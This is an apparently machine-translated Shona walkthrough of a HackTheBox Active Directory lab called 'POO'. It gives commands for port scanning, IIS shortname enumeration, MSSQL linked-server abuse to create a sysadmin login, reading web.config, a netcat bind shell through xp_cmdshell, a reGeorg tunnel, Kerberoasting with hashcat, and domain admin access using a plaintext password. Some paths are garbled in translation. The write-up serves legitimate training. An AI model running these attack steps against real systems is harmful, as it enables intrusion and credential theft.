Muchinyorwa chino, isu tichaongorora ndima kwete chete muchina, asi iyo mini-rabhoritari kubva pane saiti.
Sezvakataurwa murondedzero, POO yakagadzirirwa kuyedza hunyanzvi pamatanho ese ekurwiswa munzvimbo diki yeActive Directory. Chinangwa ndechekukanganisa mubati aripo, kuwedzera ropafadzo, uye pakupedzisira kukanganisa dura rose nekuunganidza mireza mashanu mukuita.
Kubatana murabhoritari kuri kuburikidza neVPN. Zvinokurudzirwa kuti usabatana kubva pakombuta inoshanda kana kubva kumugadziri uko kune yakakosha data kwauri, iwe paunopinda mune yakavanzika network nevanhu vanoziva chimwe chinhu nezve kuchengetedza ruzivo 🙂
ruzivo rwesangano
Kuti iwe ugone kuziva nezve zvinyorwa zvitsva, software uye rumwe ruzivo, ini ndakagadzira
Ruzivo rwese rwunopihwa nekuda kwezvinangwa zvekudzidzisa chete. Munyori wegwaro rino haatore mhosva kune chero kukanganisa kunoitwa kune chero munhu semhedzisiro yekushandisa ruzivo uye nzira dzakawanikwa semugumisiro wekudzidza gwaro iri.
Intro
Iyi endgame ine michina miviri uye ine mireza mashanu.
Tsananguro nekero yemugamuchiri aripo inopihwa zvakare.
Ngatitange!
Recon mureza
Muchina uyu une IP kero ye10.13.38.11 yandinowedzera ku /etc/hosts.
10.13.38.11 poo.htb
Nhanho yekutanga ndeyekutarisisa madoko akavhurika. Sezvo zvichitora nguva yakareba kuongorora zviteshi zvese nenmap, ini ndichatanga ndazviita nemascan. Isu tinoongorora ese maTCP uye UDP ports kubva kune tun0 interface pa500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Zvino, kuti uwane rumwe ruzivo rwakadzama nezve masevhisi anomhanya pamachiteshi, ngatimhanye scan ne -A sarudzo.
nmap -A poo.htb -p80,1433
Saka, isu tine IIS uye MSSQL masevhisi. Mune ino kesi, isu tichawana iyo chaiyo DNS zita reiyo domain uye komputa. Pawebhu server, tinokwaziswa neIIS peji repamba.
Ngatidzokororei pamusoro pemadhairekitori. Ini ndinoshandisa gobuster kune izvi. Mumaparamita tinotsanangura huwandu hwehova 128 (-t), URL (-u), duramazwi (-w) nekuwedzera izvo zvatinofarira (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Saka, tine HTTP yechokwadi ye / admin dhairekitori, pamwe ne.DS_Store desktop service yekuchengetedza faira iripo. .DS_Store mafaira anochengeta zvigadziriso zvevashandisi zveforodha, senge runyoro rwemafaira, nzvimbo yechiratidzo, mufananidzo wakasarudzika. Iro faira rakadaro rinogona kupedzisira rave muwebhu server dhairekitori yewebhu vanogadzira. Nokudaro, tinowana ruzivo pamusoro pezviri mukati medhairekitori. Nokuda kweizvi unogona kushandisa
python3 dsstore_crawler.py -i http://poo.htb/
Isu tinowana zviri mukati medhairekitori. Chinhu chinonyanya kufadza apa ndeye / dev dhairekitori, kubva kwatinogona kuona masosi uye db mafaera mumapazi maviri. Asi isu tinogona kushandisa ekutanga mavara matanhatu efaira uye dhairekitori mazita kana sevhisi iri panjodzi yeIIS ShortName. Unogona kutarisa kusagadzikana uku uchishandisa
Uye isu tinowana faira rimwe chete rinotanga ne "poo_co". Ndisingazive zvekuita zvinotevera, ndakangosarudza kubva muduramazwi redhairekitori mazwi ese anotanga na "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
Uye dzokorora ne wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Uye tsvaga izwi rakakodzera! Isu tinotarisa iyi faira, chengetedza zvitupa (tichitonga neDBNAME parameter, ivo vanobva kuMSSQL).
Isu tinopa mureza, uye tinofambira mberi ne20%.
Huh mureza
Isu tinobatana neMSSQL, ini ndinoshandisa DBeaver.
Isu hatiwane chero chinhu chinonakidza mune ino dhatabhesi, ngatigadzirei SQL Mharidzo uye titarise kuti vashandisi chii.
SELECT name FROM master..syslogins;
Tine vashandisi vaviri. Ngationgororei ropafadzo dzedu.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Saka, hapana ropafadzo. Ngationei maseva akabatanidzwa, ndakanyora nezve iyi tekiniki zvakadzama
SELECT * FROM master..sysservers;
Saka tinowana imwe SQL Server. Ngatitarisei kuitiswa kwemirairo pane iyi server tichishandisa openquery ().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Uye isu tinogona kunyange kuvaka muti wemubvunzo.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Icho chokwadi ndechekuti kana isu tichiita chikumbiro kune yakabatana server, chikumbiro chinoitwa mumamiriro emumwe mushandisi! Ngationei kuti ndeapi mamiriro emushandisi atiri kumhanyisa pane yakabatana server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Uye ikozvino ngationei kuti chii chikumbiro kubva kune yakabatana server kune yedu chinoitwa!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Saka, inzvimbo yeDBO inofanirwa kuve neropafadzo dzese. Ngatitarisei maropafadzo kana paine chikumbiro kubva kune yakabatana server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Sezvauri kuona, tine ropafadzo dzose! Ngatigadzirei admin vedu seizvi. Asi ivo havavatenderi kuburikidza nekuvhurika, ngatizviite kuburikidza ne EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
Uye ikozvino isu tinobatana nehunhu hwemushandisi mutsva, tarisa mureza mutsva dhatabhesi.
Tinopa mureza uyu toenda mberi.
Backtrack mureza
Ngatitore goko tichishandisa MSSQL, ndiri kushandisa mssqlclient kubva paimpacket package.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Tinofanira kuwana mapassword, uye chinhu chekutanga chatatosangana nacho isaiti. Nekudaro, isu tinoda webhu server config (hazvibviri kukanda goko riri nyore, sezviri pachena firewall iri kushanda).
Asi kupinda kunorambwa. Kunyangwe isu tichigona kuverenga iyo faira kubva kuMSSQL, isu tinongoda kuziva kuti ndeipi mitauro yekuronga inogadziriswa. Uye muMSSQL dhairekitori tinoona kuti kune Python.
Zvadaro hapana dambudziko kuverenga web.config file.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Nezvitupa zvawanikwa, enda ku/admin uye tora mureza.
foothold mureza
Muchokwadi, pane zvimwe zvinokanganisa kubva pakushandisa firewall, asi tichitarisa kuburikidza netiweki marongero, tinoona kuti IPv6 protocol inoshandiswawo!
Wedzera kero iyi ku /etc/hosts.
dead:babe::1001 poo6.htb
Ngatitarisei mugadziri zvakare, asi panguva ino pamusoro peIPv6.
Uye iyo WinRM sevhisi inowanikwa pamusoro peIPv6. Ngatibatanei nezvitupa zvakawanikwa.
Pane mureza padesktop, ipa iyo.
P00ned mureza
Mushure mekubvunzurudzwa pamusoro pemuenzi ne
setspn.exe -T intranet.poo -Q */*
Ngatiite murairo kuburikidza neMSSQL.
Nenzira iyi, tinowana SPN yevashandisi p00_hr uye p00_adm, zvinoreva kuti vari panjodzi yekurwiswa seKerberoasting. Muchidimbu, tinogona kuwana hashes emapassword avo.
Kutanga iwe unofanirwa kuwana ganda rakagadzikana panzvimbo yemushandisi weMSSQL. Asi sezvo isu tisingakwanisi kuwana, isu tine chinongedzo neanotambira chete kuburikidza nemadoko 80 uye 1433. Asi zvinokwanisika kutanhaira traffic kuburikidza nechiteshi 80! Nokuda kweizvi tichashandisa
Asi patinoedza kuiwana, tinowana kukanganisa 404. Izvi zvinoreva kuti * .aspx mafaira haana kuurayiwa. Kuita kuti mafaera ane aya ekuwedzera ashande, isa ASP.NET 4.5 sezvinotevera.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Uye zvino, kana tichiwana tunnel.aspx, tinowana mhinduro yekuti zvese zvagadzirira kuenda.
Ngatitangei mutengi chikamu chechishandiso, icho chinozodzosera traffic. Isu tichaendesa mberi traffic yese kubva pachiteshi 5432 kune server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Uye isu tinoshandisa proxychains kutumira traffic yechero application kuburikidza neproxy yedu. Ngatiwedzerei iyi proxy ku /etc/proxychains.conf configuration file.
Iye zvino ngatiisei purogiramu kune server
Zvino, kuburikidza neMSSQL, tinotangisa muteereri.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Uye isu tinobatanidza kuburikidza neproxy yedu.
proxychains rlwrap nc poo.htb 4321
Uye ngatitorei hashi.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Tevere, iwe unofanirwa kudzokorora pamusoro peaya hashes. Sezvo rockwe wanga usina password data duramazwi, ndakashandisa ESE mapassword dictionaries akapihwa muSeclists. Pakuverengera tinoshandisa hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Uye tinowana mapassword ese ari maviri, rekutanga muduramazwi rechiDutch_passwordlist.txt, uye rechipiri muKeyboard-Combinations.txt.
Uye saka isu tine vashandisi vatatu, tinoenda kune domain controller. Ngatitange tatsvaga kero yake.
Zvakanaka, isu takadzidza iyo IP kero yemutongi wedura. Ngatitsvagei vese vashandisi vedomeini, uye kuti ndiani wavo ari maneja. Kudhaunirodha chinyorwa kuti uwane ruzivo PowerView.ps1. Ipapo isu tichabatanidza tichishandisa zvakaipa-winrm, tichitsanangura dhairekitori ne script mu -s parameter. Uye wobva waisa iyo PowerView script.
Iye zvino tave nekuwana kumabasa ayo ose. Iyo p00_adm mushandisi inotaridzika semushandisi ane rombo, saka isu tichashanda mumamiriro ayo. Ngatigadzirei PSCredential chinhu chemushandisi uyu.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Iye zvino mirairo yese yePowershell patinotsanangura maCreds achaitwa pachinzvimbo che p00_adm. Ngatiratidze runyorwa rwevashandisi uye AdminCount hunhu.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Uye saka, mushandisi wedu ane rombo rakanaka. Ngationei kuti ndevemapoka api.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Isu tinozopedzisira tasimbisa kuti mushandisi idomasi maneja. Izvi zvinozvipa kodzero yekuenda kure kure kune domain controller. Ngatiedzei kupinda neWinRM tichishandisa mugero wedu. Ndakavhiringika nezvikanganiso zvakapihwa naReGeorg pakushandisa zvakaipa-winrm.
Zvadaro tinoshandisa imwe, iri nyore,
Isu tinoedza kubatanidza, uye isu tiri muhurongwa.
Asi hapana mureza. Wobva watarisa mushandisi uye tarisa ma desktops.
Pa mr3ks tinowana mureza uye marabhoritari yapera 100%.
Ndizvo zvose. Semhinduro, taura pamusoro pekuti wakadzidza chimwe chinhu chitsva kubva kuchinyorwa chino uye kana chakashanda kwauri.
Unogona kubatana nesu pa
Source: www.habr.com